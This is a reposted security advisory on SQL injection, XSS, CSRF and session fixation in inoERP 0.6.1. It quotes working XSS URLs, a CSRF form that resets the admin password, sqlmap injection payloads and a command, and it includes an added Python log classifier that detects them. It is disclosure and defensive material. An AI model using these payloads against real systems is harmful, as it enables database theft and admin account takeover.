inoERP 0.6.1 CSRF / XSS / SQL Injection

27 Mar 2017 | Reported by: foxmole.com | Type: packetstorm | Source: packetstormsecurity.com

inoERP 0.6.1 has multiple security issues, including SQL injection, cross site scripting (XSS), and cross site request forgery (CSRF), rated as critical technical risk.

=== FOXMOLE - Security Advisory 2017-01-25 ===  
  
inoERP - Multiple Issues  
~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Affected Versions  
=================  
inoERP 0.6.1  
  
Issue Overview  
==============  
Vulnerability Type: SQL Injection, Cross Site Scripting, Cross Site Request Forgery, Session Fixation  
Technical Risk: critical  
Likelihood of Exploitation: medium  
Vendor: inoERP  
Vendor URL: http://inoideas.org/ / https://github.com/inoerp/inoERP  
Credits: FOXMOLE employee Tim Herres  
Advisory URL: https://www.foxmole.com/advisories/foxmole-2017-01-25.txt  
Advisory Status: Public  
OVE-ID: OVE-20170126-0002  
CVSS 2.0: 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C)  
  
  
Impact  
======  
There are multiple SQL Injection vulnerabilities, exploitable without authentication.
An attacker could use the SQL Injection to read from and write to the database directly.
This means the impact on all applications that share this database is high.
The inoERP software also lacks input validation, resulting in several reflected and stored XSS vulnerabilities.
  
  
Issue Description  
=================  
The following findings are only examples; there are many more. The whole application should be reviewed.
  
All items were tested using Firefox 52.
  
1.) Cross Site Scripting:  
Stored:  
Create a new question via Forum --> Ask a question
Vulnerable fields: Title, Content
Used Payload: Test<script>alert("xss")</script>  
  
Response:  
[...]  
<title>Test<script>alert("xss")</script> - inoERP!</title>  
[...]  
  
The latest questions are included on the start page, so the entered payload is executed directly on the start page.
  
Reflected:  
Authenticated:
http://192.168.241.143/inoerp/form.php?class_name=%3CscRipt%3Ealert(%22xss%22)%3C%2fscRipt%3E&mode=9&user_id=7  
http://192.168.241.143/inoerp/includes/json/json_blank_search.php?class_name=content&content_type_id=49&window_type=%22%3C/scRipt%3E%3CscRipt%3Ealert(%22xss%22)%3C/scRipt%3E
http://192.168.241.143/inoerp/program.php?class_name=%3CscRipt%3Ealert(%22xss%22)%3C%2fscRipt%3E&program_name=prg_all_combinations&program_type=download_report  
  
Unauthenticated:  
http://192.168.241.143/inoerp/index.php/'%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert(%22xss%22)%3C/scRipt%3E  
  
2.) No protection against Cross Site Request Forgery Attacks:  
PoC: Changing the admin user credentials.  
  
<html>  
<body>  
<form action="http://<IP>/inoerp/form.php?class_name=user" method="POST">  
<input type="hidden" name="headerData[0][name]" value="user_id[]" />  
<input type="hidden" name="headerData[0][value]" value="1" />  
<input type="hidden" name="headerData[1][name]" value="username[]" />  
<input type="hidden" name="headerData[1][value]" value="inoerp" />  
<input type="hidden" name="headerData[2][name]" value="enteredPassword[]" />  
<input type="hidden" name="headerData[2][value]" value="test" />  
<input type="hidden" name="headerData[3][name]" value="enteredRePassword[]" />  
<input type="hidden" name="headerData[3][value]" value="test" />  
<input type="hidden" name="headerData[4][name]" value="first_name[]" />  
<input type="hidden" name="headerData[4][value]" value="inoerp" />  
<input type="hidden" name="headerData[5][name]" value="last_name[]" />  
<input type="hidden" name="headerData[5][value]" value="inoerp" />  
<input type="hidden" name="headerData[6][name]" value="email[]" />  
<input type="hidden" name="headerData[6][value]" value="[email protected]" />  
<input type="hidden" name="headerData[7][name]" value="phone[]" />  
[..snipped...]  
  
If a privileged user triggers this request, the password of the admin user (user id 1) is set to "test".
  
3.) SQL Injection:  
Auth required: No
#####  
http://192.168.241.143/inoerp/form.php?  
Parameter: module_code (GET)  
Type: boolean-based blind  
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or  
GROUP BY clause  
Payload: module_code=test' RLIKE (SELECT (CASE WHEN (2838=2838) THEN  
0x74657374 ELSE 0x28 END))-- qkmO  
  
Type: error-based  
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or  
GROUP BY clause (FLOOR)  
Payload: module_code=test' AND (SELECT 8706 FROM(SELECT  
COUNT(*),CONCAT(0x716b7a6271,(SELECT  
(ELT(8706=8706,1))),0x7171626a71,FLOOR(RAND(0)*2))x FROM  
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- NPEq  
  
Type: stacked queries  
Title: MySQL > 5.0.11 stacked queries (comment)  
Payload: module_code=test';SELECT SLEEP(5)#  
  
Type: AND/OR time-based blind  
Title: MySQL >= 5.0.12 OR time-based blind  
Payload: module_code=test' OR SLEEP(5)-- STgC  
  
Exploitable using e.g. sqlmap.
  
Blind SQL Injection:  
sqlmap -u "http://192.168.241.143/inoerp/content.php?content_type%5b%5d=test&search_text=3&search_document_list%5b%5d=all" -p "content_type%5b%5d" --dbms="MySQL"
Parameter: content_type[] (GET)  
Type: boolean-based blind  
Title: OR boolean-based blind - WHERE or HAVING clause  
Payload: content_type[]=-8366' OR 7798=7798 AND  
'eanR'='eanR&search_text=3&search_document_list[]=all  
  
Type: AND/OR time-based blind  
Title: MySQL >= 5.0.12 OR time-based blind  
Payload: content_type[]=test' OR SLEEP(5) AND  
'exIO'='exIO&search_text=3&search_document_list[]=all  
#####  
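As an added detection example (not part of the FOXMOLE advisory or of inoERP), the following script classifies web server access-log lines against findings 1 to 3 above: it URL-decodes the request target and matches the SQL fragments and script tags used in the quoted payloads, and flags POSTs to form.php?class_name=user whose Referer is missing or from a foreign origin as CSRF candidates. The log lines, the client IPs and the evil.example referer are constructed; the app host 192.168.241.143 is the advisory's test system.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Combined log format: client ident user [time] "METHOD TARGET PROTO" status size "referer" "agent"
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" \d{3} \S+ "([^"]*)" "[^"]*"$')

# SQL fragments taken from the sqlmap payloads quoted in the advisory (finding 3).
SQLI_PATTERNS = [re.compile(p, re.IGNORECASE) for p in (
    r"'\s*RLIKE\b",                   # MySQL RLIKE boolean-based blind
    r"\bSLEEP\s*\(",                  # stacked queries / time-based blind
    r"FLOOR\s*\(\s*RAND\s*\(",        # FLOOR(RAND()) error-based
    r"'\s*(OR|AND)\s+\d+\s*=\s*\d+",  # -8366' OR 7798=7798
)]
XSS_RE = re.compile(r"<\s*/?\s*script\b", re.IGNORECASE)  # catches the scRipt case variants

def classify(line, app_host):
    """Return (client_ip, tags) for one access-log line, or None if the line does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    client, method, target, referer = m.groups()
    parts = urlsplit(target)
    # Decode twice so one layer of double URL-encoding does not hide the payload from the regexes.
    decoded = unquote(unquote(parts.path + "?" + parts.query))
    tags = set()
    if XSS_RE.search(decoded):
        tags.add("xss")
    if any(p.search(decoded) for p in SQLI_PATTERNS):
        tags.add("sqli")
    # CSRF candidate: state-changing POST to the user form whose Referer is missing or from a foreign origin.
    params = dict(parse_qsl(parts.query))
    if method == "POST" and parts.path.endswith("/form.php") and params.get("class_name") == "user":
        ref_host = urlsplit(referer).hostname if referer not in ("", "-") else None
        if ref_host != app_host:
            tags.add("csrf-candidate")
    return client, tags

# Constructed sample lines (not captured from the advisory's test system); they reuse the quoted payload shapes.
SAMPLE_LOGS = [
    '10.0.0.5 - - [27/Mar/2017:10:00:01 +0000] "GET /inoerp/form.php?module_code=test%27%20OR%20SLEEP(5)--%20STgC HTTP/1.1" 200 512 "-" "sqlmap/1.1"',
    '10.0.0.6 - - [27/Mar/2017:10:00:02 +0000] "GET /inoerp/index.php/%27%22--%3E%3C/scRipt%3E%3CscRipt%3Ealert(%22xss%22)%3C/scRipt%3E HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [27/Mar/2017:10:00:03 +0000] "POST /inoerp/form.php?class_name=user HTTP/1.1" 302 0 "http://evil.example/csrf.html" "Mozilla/5.0"',
    '10.0.0.8 - - [27/Mar/2017:10:00:04 +0000] "POST /inoerp/form.php?class_name=user HTTP/1.1" 302 0 "http://192.168.241.143/inoerp/form.php?class_name=user" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for entry in SAMPLE_LOGS:
        print(classify(entry, "192.168.241.143"))
```

The Referer check only produces candidates: browsers may strip the header, so a same-origin POST without Referer must be confirmed against the session rather than blocked on this signal alone.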
  
4.) Session Fixation:  
After a successful login, the session ID (PHPSESSID) remains the same:
Before Login: INOERP123123=t4e5ef5kqnv6d1u2uguf7lraa2  
After Login: INOERP123123=t4e5ef5kqnv6d1u2uguf7lraa2  
  
Temporary Workaround and Fix  
============================  
FOXMOLE advises restricting access to all vulnerable inoERP systems until all vulnerabilities are fixed.
  
  
  
History  
=======  
2017-01-25 Issue discovered  
2017-01-26 Vendor contacted -> no response  
2017-02-20 Vendor contacted again -> no response  
2017-03-06 Vendor contacted again -> no response  
2017-03-27 Advisory Release  
  
  
GPG Signature  
=============  
This advisory is signed with the GPG key of the FOXMOLE advisories team.  
The key can be downloaded here: https://www.foxmole.com/advisories-key-3812092199E3277C.asc  
